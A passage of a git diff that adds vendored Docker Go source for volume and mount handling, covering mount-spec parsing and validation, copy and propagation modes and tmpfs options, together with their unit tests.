errExtraField(name string) error { + return fmt.Errorf("field %s must not be specified", name) +} +func errMissingField(name string) error { + return fmt.Errorf("field %s must not be empty", name) +} + +func validateAbsolute(p string) error { + p = convertSlash(p) + if filepath.IsAbs(p) { + return nil + } + return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) +} diff --git a/vendor/github.com/docker/docker/volume/validate_test.go b/vendor/github.com/docker/docker/volume/validate_test.go new file mode 100644 index 0000000000..8732500fc0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate_test.go @@ -0,0 +1,43 @@ +package volume + +import ( + "errors" + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestValidateMount(t *testing.T) { + testDir, err := ioutil.TempDir("", "test-validate-mount") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + + cases := []struct { + input mount.Mount + expected error + }{ + {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil}, + {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, + {mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindNotExist}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil}, + {mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")}, + } + for i, x := range cases { + err := validateMountConfig(&x.input) + if err == nil && x.expected == nil { + continue + } + if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { + t.Fatalf("expected %q, got %q, case: %d", x.expected, err, i) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/validate_test_unix.go b/vendor/github.com/docker/docker/volume/validate_test_unix.go new file mode 100644 index 0000000000..dd1de2f643 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate_test_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package volume + +var ( + testDestinationPath = "/foo" + testSourcePath = "/foo" +) diff --git a/vendor/github.com/docker/docker/volume/validate_test_windows.go b/vendor/github.com/docker/docker/volume/validate_test_windows.go new file mode 100644 index 0000000000..d5f86ac850 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate_test_windows.go @@ -0,0 +1,6 @@ +package volume + +var ( + testDestinationPath = `c:\foo` + testSourcePath = `c:\foo` +) diff --git a/vendor/github.com/docker/docker/volume/volume.go b/vendor/github.com/docker/docker/volume/volume.go new file mode 100644 index 0000000000..f3227fe485 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume.go @@ -0,0 +1,323 @@ +package volume + +import ( + "fmt" + "os" + "path/filepath" + "strings" + "syscall" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/runc/libcontainer/label" + "github.com/pkg/errors" +) + +// DefaultDriverName is the driver name used for the driver +// implemented in the local package. +const DefaultDriverName = "local" + +// Scopes define if a volume has is cluster-wide (global) or local only. +// Scopes are returned by the volume driver when it is queried for capabilities and then set on a volume +const ( + LocalScope = "local" + GlobalScope = "global" +) + +// Driver is for creating and removing volumes. +type Driver interface { + // Name returns the name of the volume driver. + Name() string + // Create makes a new volume with the given id. + Create(name string, opts map[string]string) (Volume, error) + // Remove deletes the volume. + Remove(vol Volume) (err error) + // List lists all the volumes the driver has + List() ([]Volume, error) + // Get retrieves the volume with the requested name + Get(name string) (Volume, error) + // Scope returns the scope of the driver (e.g. `global` or `local`). + // Scope determines how the driver is handled at a cluster level + Scope() string +} + +// Capability defines a set of capabilities that a driver is able to handle. +type Capability struct { + // Scope is the scope of the driver, `global` or `local` + // A `global` scope indicates that the driver manages volumes across the cluster + // A `local` scope indicates that the driver only manages volumes resources local to the host + // Scope is declared by the driver + Scope string +} + +// Volume is a place to store data. It is backed by a specific driver, and can be mounted. +type Volume interface { + // Name returns the name of the volume + Name() string + // DriverName returns the name of the driver which owns this volume. + DriverName() string + // Path returns the absolute path to the volume. + Path() string + // Mount mounts the volume and returns the absolute path to + // where it can be consumed. + Mount(id string) (string, error) + // Unmount unmounts the volume when it is no longer in use. + Unmount(id string) error + // Status returns low-level status information about a volume + Status() map[string]interface{} +} + +// DetailedVolume wraps a Volume with user-defined labels, options, and cluster scope (e.g., `local` or `global`) +type DetailedVolume interface { + Labels() map[string]string + Options() map[string]string + Scope() string + Volume +} + +// MountPoint is the intersection point between a volume and a container. It +// specifies which volume is to be used and where inside a container it should +// be mounted. +type MountPoint struct { + // Source is the source path of the mount. + // E.g. `mount --bind /foo /bar`, `/foo` is the `Source`. + Source string + // Destination is the path relative to the container root (`/`) to the mount point + // It is where the `Source` is mounted to + Destination string + // RW is set to true when the mountpoint should be mounted as read-write + RW bool + // Name is the name reference to the underlying data defined by `Source` + // e.g., the volume name + Name string + // Driver is the volume driver used to create the volume (if it is a volume) + Driver string + // Type of mount to use, see `Type` definitions in github.com/docker/docker/api/types/mount + Type mounttypes.Type `json:",omitempty"` + // Volume is the volume providing data to this mountpoint. + // This is nil unless `Type` is set to `TypeVolume` + Volume Volume `json:"-"` + + // Mode is the comma separated list of options supplied by the user when creating + // the bind/volume mount. + // Note Mode is not used on Windows + Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`" + + // Propagation describes how the mounts are propagated from the host into the + // mount point, and vice-versa. + // See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt + // Note Propagation is not used on Windows + Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string + + // Specifies if data should be copied from the container before the first mount + // Use a pointer here so we can tell if the user set this value explicitly + // This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated + CopyData bool `json:"-"` + // ID is the opaque ID used to pass to the volume driver. + // This should be set by calls to `Mount` and unset by calls to `Unmount` + ID string `json:",omitempty"` + + // Sepc is a copy of the API request that created this mount. + Spec mounttypes.Mount +} + +// Setup sets up a mount point by either mounting the volume if it is +// configured, or creating the source directory if supplied. +func (m *MountPoint) Setup(mountLabel string, rootUID, rootGID int) (string, error) { + if m.Volume != nil { + id := m.ID + if id == "" { + id = stringid.GenerateNonCryptoID() + } + path, err := m.Volume.Mount(id) + if err != nil { + return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source) + } + m.ID = id + return path, nil + } + if len(m.Source) == 0 { + return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined") + } + // system.MkdirAll() produces an error if m.Source exists and is a file (not a directory), + if m.Type == mounttypes.TypeBind { + // idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory) + // also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it + if err := idtools.MkdirAllNewAs(m.Source, 0755, rootUID, rootGID); err != nil { + if perr, ok := err.(*os.PathError); ok { + if perr.Err != syscall.ENOTDIR { + return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source) + } + } + } + } + if label.RelabelNeeded(m.Mode) { + if err := label.Relabel(m.Source, mountLabel, label.IsShared(m.Mode)); err != nil { + return "", errors.Wrapf(err, "error setting label on mount source '%s'", m.Source) + } + } + return m.Source, nil +} + +// Path returns the path of a volume in a mount point. +func (m *MountPoint) Path() string { + if m.Volume != nil { + return m.Volume.Path() + } + return m.Source +} + +// ParseVolumesFrom ensures that the supplied volumes-from is valid. +func ParseVolumesFrom(spec string) (string, string, error) { + if len(spec) == 0 { + return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") + } + + specParts := strings.SplitN(spec, ":", 2) + id := specParts[0] + mode := "rw" + + if len(specParts) == 2 { + mode = specParts[1] + if !ValidMountMode(mode) { + return "", "", errInvalidMode(mode) + } + // For now don't allow propagation properties while importing + // volumes from data container. These volumes will inherit + // the same propagation property as of the original volume + // in data container. This probably can be relaxed in future. + if HasPropagation(mode) { + return "", "", errInvalidMode(mode) + } + // Do not allow copy modes on volumes-from + if _, isSet := getCopyMode(mode); isSet { + return "", "", errInvalidMode(mode) + } + } + return id, mode, nil +} + +// ParseMountRaw parses a raw volume spec (e.g. `-v /foo:/bar:shared`) into a +// structured spec. Once the raw spec is parsed it relies on `ParseMountSpec` to +// validate the spec and create a MountPoint +func ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + arr, err := splitRawSpec(convertSlash(raw)) + if err != nil { + return nil, err + } + + var spec mounttypes.Mount + var mode string + switch len(arr) { + case 1: + // Just a destination path in the container + spec.Target = arr[0] + case 2: + if ValidMountMode(arr[1]) { + // Destination + Mode is not a valid volume - volumes + // cannot include a mode. eg /foo:rw + return nil, errInvalidSpec(raw) + } + // Host Source Path or Name + Destination + spec.Source = arr[0] + spec.Target = arr[1] + case 3: + // HostSourcePath+DestinationPath+Mode + spec.Source = arr[0] + spec.Target = arr[1] + mode = arr[2] + default: + return nil, errInvalidSpec(raw) + } + + if !ValidMountMode(mode) { + return nil, errInvalidMode(mode) + } + + if filepath.IsAbs(spec.Source) { + spec.Type = mounttypes.TypeBind + } else { + spec.Type = mounttypes.TypeVolume + } + + spec.ReadOnly = !ReadWrite(mode) + + // cannot assume that if a volume driver is passed in that we should set it + if volumeDriver != "" && spec.Type == mounttypes.TypeVolume { + spec.VolumeOptions = &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{Name: volumeDriver}, + } + } + + if copyData, isSet := getCopyMode(mode); isSet { + if spec.VolumeOptions == nil { + spec.VolumeOptions = &mounttypes.VolumeOptions{} + } + spec.VolumeOptions.NoCopy = !copyData + } + if HasPropagation(mode) { + spec.BindOptions = &mounttypes.BindOptions{ + Propagation: GetPropagation(mode), + } + } + + mp, err := ParseMountSpec(spec, platformRawValidationOpts...) + if mp != nil { + mp.Mode = mode + } + if err != nil { + err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) + } + return mp, err +} + +// ParseMountSpec reads a mount config, validates it, and configures a mountpoint from it. +func ParseMountSpec(cfg mounttypes.Mount, options ...func(*validateOpts)) (*MountPoint, error) { + if err := validateMountConfig(&cfg, options...); err != nil { + return nil, err + } + mp := &MountPoint{ + RW: !cfg.ReadOnly, + Destination: clean(convertSlash(cfg.Target)), + Type: cfg.Type, + Spec: cfg, + } + + switch cfg.Type { + case mounttypes.TypeVolume: + if cfg.Source == "" { + mp.Name = stringid.GenerateNonCryptoID() + } else { + mp.Name = cfg.Source + } + mp.CopyData = DefaultCopyMode + + if cfg.VolumeOptions != nil { + if cfg.VolumeOptions.DriverConfig != nil { + mp.Driver = cfg.VolumeOptions.DriverConfig.Name + } + if cfg.VolumeOptions.NoCopy { + mp.CopyData = false + } + } + case mounttypes.TypeBind: + mp.Source = clean(convertSlash(cfg.Source)) + if cfg.BindOptions != nil { + if len(cfg.BindOptions.Propagation) > 0 { + mp.Propagation = cfg.BindOptions.Propagation + } + } + case mounttypes.TypeTmpfs: + // NOP + } + return mp, nil +} + +func errInvalidMode(mode string) error { + return fmt.Errorf("invalid mode: %v", mode) +} + +func errInvalidSpec(spec string) error { + return fmt.Errorf("invalid volume specification: '%s'", spec) +} diff --git a/vendor/github.com/docker/docker/volume/volume_copy.go b/vendor/github.com/docker/docker/volume/volume_copy.go new file mode 100644 index 0000000000..77f06a0d1f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_copy.go @@ -0,0 +1,23 @@ +package volume + +import "strings" + +// {=isEnabled} +var copyModes = map[string]bool{ + "nocopy": false, +} + +func copyModeExists(mode string) bool { + _, exists := copyModes[mode] + return exists +} + +// GetCopyMode gets the copy mode from the mode string for mounts +func getCopyMode(mode string) (bool, bool) { + for _, o := range strings.Split(mode, ",") { + if isEnabled, exists := copyModes[o]; exists { + return isEnabled, true + } + } + return DefaultCopyMode, false +} diff --git a/vendor/github.com/docker/docker/volume/volume_copy_unix.go b/vendor/github.com/docker/docker/volume/volume_copy_unix.go new file mode 100644 index 0000000000..ad66e17637 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_copy_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package volume + +const ( + // DefaultCopyMode is the copy mode used by default for normal/named volumes + DefaultCopyMode = true +) diff --git a/vendor/github.com/docker/docker/volume/volume_copy_windows.go b/vendor/github.com/docker/docker/volume/volume_copy_windows.go new file mode 100644 index 0000000000..798638c878 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_copy_windows.go @@ -0,0 +1,6 @@ +package volume + +const ( + // DefaultCopyMode is the copy mode used by default for normal/named volumes + DefaultCopyMode = false +) diff --git a/vendor/github.com/docker/docker/volume/volume_linux.go b/vendor/github.com/docker/docker/volume/volume_linux.go new file mode 100644 index 0000000000..d4b4d800b2 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_linux.go @@ -0,0 +1,56 @@ +// +build linux + +package volume + +import ( + "fmt" + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string +// for mount(2). +func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { + var rawOpts []string + if readOnly { + rawOpts = append(rawOpts, "ro") + } + + if opt != nil && opt.Mode != 0 { + rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode)) + } + + if opt != nil && opt.SizeBytes != 0 { + // calculate suffix here, making this linux specific, but that is + // okay, since API is that way anyways. + + // we do this by finding the suffix that divides evenly into the + // value, returing the value itself, with no suffix, if it fails. + // + // For the most part, we don't enforce any semantic to this values. + // The operating system will usually align this and enforce minimum + // and maximums. + var ( + size = opt.SizeBytes + suffix string + ) + for _, r := range []struct { + suffix string + divisor int64 + }{ + {"g", 1 << 30}, + {"m", 1 << 20}, + {"k", 1 << 10}, + } { + if size%r.divisor == 0 { + size = size / r.divisor + suffix = r.suffix + break + } + } + + rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix)) + } + return strings.Join(rawOpts, ","), nil +} diff --git a/vendor/github.com/docker/docker/volume/volume_linux_test.go b/vendor/github.com/docker/docker/volume/volume_linux_test.go new file mode 100644 index 0000000000..40ce5525a3 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_linux_test.go @@ -0,0 +1,51 @@ +// +build linux + +package volume + +import ( + "strings" + "testing" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +func TestConvertTmpfsOptions(t *testing.T) { + type testCase struct { + opt mounttypes.TmpfsOptions + readOnly bool + expectedSubstrings []string + unexpectedSubstrings []string + } + cases := []testCase{ + { + opt: mounttypes.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700}, + readOnly: false, + expectedSubstrings: []string{"size=1m", "mode=700"}, + unexpectedSubstrings: []string{"ro"}, + }, + { + opt: mounttypes.TmpfsOptions{}, + readOnly: true, + expectedSubstrings: []string{"ro"}, + unexpectedSubstrings: []string{}, + }, + } + for _, c := range cases { + data, err := ConvertTmpfsOptions(&c.opt, c.readOnly) + if err != nil { + t.Fatalf("could not convert %+v (readOnly: %v) to string: %v", + c.opt, c.readOnly, err) + } + t.Logf("data=%q", data) + for _, s := range c.expectedSubstrings { + if !strings.Contains(data, s) { + t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c) + } + } + for _, s := range c.unexpectedSubstrings { + if strings.Contains(data, s) { + t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c) + } + } + } +} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go new file mode 100644 index 0000000000..1de57ab52b --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go @@ -0,0 +1,47 @@ +// +build linux + +package volume + +import ( + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +// DefaultPropagationMode defines what propagation mode should be used by +// default if user has not specified one explicitly. +// propagation modes +const DefaultPropagationMode = mounttypes.PropagationRPrivate + +var propagationModes = map[mounttypes.Propagation]bool{ + mounttypes.PropagationPrivate: true, + mounttypes.PropagationRPrivate: true, + mounttypes.PropagationSlave: true, + mounttypes.PropagationRSlave: true, + mounttypes.PropagationShared: true, + mounttypes.PropagationRShared: true, +} + +// GetPropagation extracts and returns the mount propagation mode. If there +// are no specifications, then by default it is "private". +func GetPropagation(mode string) mounttypes.Propagation { + for _, o := range strings.Split(mode, ",") { + prop := mounttypes.Propagation(o) + if propagationModes[prop] { + return prop + } + } + return DefaultPropagationMode +} + +// HasPropagation checks if there is a valid propagation mode present in +// passed string. Returns true if a valid propagation mode specifier is +// present, false otherwise. +func HasPropagation(mode string) bool { + for _, o := range strings.Split(mode, ",") { + if propagationModes[mounttypes.Propagation(o)] { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go new file mode 100644 index 0000000000..46d0265062 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go @@ -0,0 +1,65 @@ +// +build linux + +package volume + +import ( + "strings" + "testing" +) + +func TestParseMountRawPropagation(t *testing.T) { + var ( + valid []string + invalid map[string]string + ) + + valid = []string{ + "/hostPath:/containerPath:shared", + "/hostPath:/containerPath:rshared", + "/hostPath:/containerPath:slave", + "/hostPath:/containerPath:rslave", + "/hostPath:/containerPath:private", + "/hostPath:/containerPath:rprivate", + "/hostPath:/containerPath:ro,shared", + "/hostPath:/containerPath:ro,slave", + "/hostPath:/containerPath:ro,private", + "/hostPath:/containerPath:ro,z,shared", + "/hostPath:/containerPath:ro,Z,slave", + "/hostPath:/containerPath:Z,ro,slave", + "/hostPath:/containerPath:slave,Z,ro", + "/hostPath:/containerPath:Z,slave,ro", + "/hostPath:/containerPath:slave,ro,Z", + "/hostPath:/containerPath:rslave,ro,Z", + "/hostPath:/containerPath:ro,rshared,Z", + "/hostPath:/containerPath:ro,Z,rprivate", + } + invalid = map[string]string{ + "/path:/path:ro,rshared,rslave": `invalid mode`, + "/path:/path:ro,z,rshared,rslave": `invalid mode`, + "/path:shared": "invalid volume specification", + "/path:slave": "invalid volume specification", + "/path:private": "invalid volume specification", + "name:/absolute-path:shared": "invalid volume specification", + "name:/absolute-path:rshared": "invalid volume specification", + "name:/absolute-path:slave": "invalid volume specification", + "name:/absolute-path:rslave": "invalid volume specification", + "name:/absolute-path:private": "invalid volume specification", + "name:/absolute-path:rprivate": "invalid volume specification", + } + + for _, path := range valid { + if _, err := ParseMountRaw(path, "local"); err != nil { + t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range invalid { + if _, err := ParseMountRaw(path, "local"); err == nil { + t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err %v", path, err) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) + } + } + } +} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go new file mode 100644 index 0000000000..7311ffc2e0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go @@ -0,0 +1,24 @@ +// +build !linux + +package volume + +import mounttypes "github.com/docker/docker/api/types/mount" + +// DefaultPropagationMode is used only in linux. In other cases it returns +// empty string. +const DefaultPropagationMode mounttypes.Propagation = "" + +// propagation modes not supported on this platform. +var propagationModes = map[mounttypes.Propagation]bool{} + +// GetPropagation is not supported. Return empty string. +func GetPropagation(mode string) mounttypes.Propagation { + return DefaultPropagationMode +} + +// HasPropagation checks if there is a valid propagation mode present in +// passed string. Returns true if a valid propagation mode specifier is +// present, false otherwise. +func HasPropagation(mode string) bool { + return false +} diff --git a/vendor/github.com/docker/docker/volume/volume_test.go b/vendor/github.com/docker/docker/volume/volume_test.go new file mode 100644 index 0000000000..54df38053f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_test.go @@ -0,0 +1,269 @@ +package volume + +import ( + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestParseMountRaw(t *testing.T) { + var ( + valid []string + invalid map[string]string + ) + + if runtime.GOOS == "windows" { + valid = []string{ + `d:\`, + `d:`, + `d:\path`, + `d:\path with space`, + // TODO Windows post TP5 - readonly support `d:\pathandmode:ro`, + `c:\:d:\`, + `c:\windows\:d:`, + `c:\windows:d:\s p a c e`, + `c:\windows:d:\s p a c e:RW`, + `c:\program files:d:\s p a c e i n h o s t d i r`, + `0123456789name:d:`, + `MiXeDcAsEnAmE:d:`, + `name:D:`, + `name:D::rW`, + `name:D::RW`, + // TODO Windows post TP5 - readonly support `name:D::RO`, + `c:/:d:/forward/slashes/are/good/too`, + // TODO Windows post TP5 - readonly support `c:/:d:/including with/spaces:ro`, + `c:\Windows`, // With capital + `c:\Program Files (x86)`, // With capitals and brackets + } + invalid = map[string]string{ + ``: "invalid volume specification: ", + `.`: "invalid volume specification: ", + `..\`: "invalid volume specification: ", + `c:\:..\`: "invalid volume specification: ", + `c:\:d:\:xyzzy`: "invalid volume specification: ", + `c:`: "cannot be `c:`", + `c:\`: "cannot be `c:`", + `c:\notexist:d:`: `source path does not exist`, + `c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`, + `name<:d:`: `invalid volume specification`, + `name>:d:`: `invalid volume specification`, + `name::d:`: `invalid volume specification`, + `name":d:`: `invalid volume specification`, + `name\:d:`: `invalid volume specification`, + `name*:d:`: `invalid volume specification`, + `name|:d:`: `invalid volume specification`, + `name?:d:`: `invalid volume specification`, + `name/:d:`: `invalid volume specification`, + `d:\pathandmode:rw`: `invalid volume specification`, + `con:d:`: `cannot be a reserved word for Windows filenames`, + `PRN:d:`: `cannot be a reserved word for Windows filenames`, + `aUx:d:`: `cannot be a reserved word for Windows filenames`, + `nul:d:`: `cannot be a reserved word for Windows filenames`, + `com1:d:`: `cannot be a reserved word for Windows filenames`, + `com2:d:`: `cannot be a reserved word for Windows filenames`, + `com3:d:`: `cannot be a reserved word for Windows filenames`, + `com4:d:`: `cannot be a reserved word for Windows filenames`, + `com5:d:`: `cannot be a reserved word for Windows filenames`, + `com6:d:`: `cannot be a reserved word for Windows filenames`, + `com7:d:`: `cannot be a reserved word for Windows filenames`, + `com8:d:`: `cannot be a reserved word for Windows filenames`, + `com9:d:`: `cannot be a reserved word for Windows filenames`, + `lpt1:d:`: `cannot be a reserved word for Windows filenames`, + `lpt2:d:`: `cannot be a reserved word for Windows filenames`, + `lpt3:d:`: `cannot be a reserved word for Windows filenames`, + `lpt4:d:`: `cannot be a reserved word for Windows filenames`, + `lpt5:d:`: `cannot be a reserved word for Windows filenames`, + `lpt6:d:`: `cannot be a reserved word for Windows filenames`, + `lpt7:d:`: `cannot be a reserved word for Windows filenames`, + `lpt8:d:`: `cannot be a reserved word for Windows filenames`, + `lpt9:d:`: `cannot be a reserved word for Windows filenames`, + `c:\windows\system32\ntdll.dll`: `Only directories can be mapped on this platform`, + } + + } else { + valid = []string{ + "/home", + "/home:/home", + "/home:/something/else", + "/with space", + "/home:/with space", + "relative:/absolute-path", + "hostPath:/containerPath:ro", + "/hostPath:/containerPath:rw", + "/rw:/ro", + } + invalid = map[string]string{ + "": "invalid volume specification", + "./": "mount path must be absolute", + "../": "mount path must be absolute", + "/:../": "mount path must be absolute", + "/:path": "mount path must be absolute", + ":": "invalid volume specification", + "/tmp:": "invalid volume specification", + ":test": "invalid volume specification", + ":/test": "invalid volume specification", + "tmp:": "invalid volume specification", + ":test:": "invalid volume specification", + "::": "invalid volume specification", + ":::": "invalid volume specification", + "/tmp:::": "invalid volume specification", + ":/tmp::": "invalid volume specification", + "/path:rw": "invalid volume specification", + "/path:ro": "invalid volume specification", + "/rw:rw": "invalid volume specification", + "path:ro": "invalid volume specification", + "/path:/path:sw": `invalid mode`, + "/path:/path:rwz": `invalid mode`, + } + } + + for _, path := range valid { + if _, err := ParseMountRaw(path, "local"); err != nil { + t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range invalid { + if mp, err := ParseMountRaw(path, "local"); err == nil { + t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) + } + } + } +} + +// testParseMountRaw is a structure used by TestParseMountRawSplit for +// specifying test cases for the ParseMountRaw() function. +type testParseMountRaw struct { + bind string + driver string + expDest string + expSource string + expName string + expDriver string + expRW bool + fail bool +} + +func TestParseMountRawSplit(t *testing.T) { + var cases []testParseMountRaw + if runtime.GOOS == "windows" { + cases = []testParseMountRaw{ + {`c:\:d:`, "local", `d:`, `c:\`, ``, "", true, false}, + {`c:\:d:\`, "local", `d:\`, `c:\`, ``, "", true, false}, + // TODO Windows post TP5 - Add readonly support {`c:\:d:\:ro`, "local", `d:\`, `c:\`, ``, "", false, false}, + {`c:\:d:\:rw`, "local", `d:\`, `c:\`, ``, "", true, false}, + {`c:\:d:\:foo`, "local", `d:\`, `c:\`, ``, "", false, true}, + {`name:d::rw`, "local", `d:`, ``, `name`, "local", true, false}, + {`name:d:`, "local", `d:`, ``, `name`, "local", true, false}, + // TODO Windows post TP5 - Add readonly support {`name:d::ro`, "local", `d:`, ``, `name`, "local", false, false}, + {`name:c:`, "", ``, ``, ``, "", true, true}, + {`driver/name:c:`, "", ``, ``, ``, "", true, true}, + } + } else { + cases = []testParseMountRaw{ + {"/tmp:/tmp1", "", "/tmp1", "/tmp", "", "", true, false}, + {"/tmp:/tmp2:ro", "", "/tmp2", "/tmp", "", "", false, false}, + {"/tmp:/tmp3:rw", "", "/tmp3", "/tmp", "", "", true, false}, + {"/tmp:/tmp4:foo", "", "", "", "", "", false, true}, + {"name:/named1", "", "/named1", "", "name", "", true, false}, + {"name:/named2", "external", "/named2", "", "name", "external", true, false}, + {"name:/named3:ro", "local", "/named3", "", "name", "local", false, false}, + {"local/name:/tmp:rw", "", "/tmp", "", "local/name", "", true, false}, + {"/tmp:tmp", "", "", "", "", "", true, true}, + } + } + + for i, c := range cases { + t.Logf("case %d", i) + m, err := ParseMountRaw(c.bind, c.driver) + if c.fail { + if err == nil { + t.Fatalf("Expected error, was nil, for spec %s\n", c.bind) + } + continue + } + + if m == nil || err != nil { + t.Fatalf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error()) + continue + } + + if m.Destination != c.expDest { + t.Fatalf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind) + } + + if m.Source != c.expSource { + t.Fatalf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind) + } + + if m.Name != c.expName { + t.Fatalf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind) + } + + if m.Driver != c.expDriver { + t.Fatalf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind) + } + + if m.RW != c.expRW { + t.Fatalf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind) + } + } +} + +func TestParseMountSpec(t *testing.T) { + type c struct { + input mount.Mount + expected MountPoint + } + testDir, err := ioutil.TempDir("", "test-mount-config") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + + cases := []c{ + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, + } + + for i, c := range cases { + t.Logf("case %d", i) + mp, err := ParseMountSpec(c.input) + if err != nil { + t.Fatal(err) + } + + if c.expected.Type != mp.Type { + t.Fatalf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type) + } + if c.expected.Destination != mp.Destination { + t.Fatalf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination) + } + if c.expected.Source != mp.Source { + t.Fatalf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source) + } + if c.expected.RW != mp.RW { + t.Fatalf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW) + } + if c.expected.Propagation != mp.Propagation { + t.Fatalf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation) + } + if c.expected.Driver != mp.Driver { + t.Fatalf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver) + } + if c.expected.CopyData != mp.CopyData { + 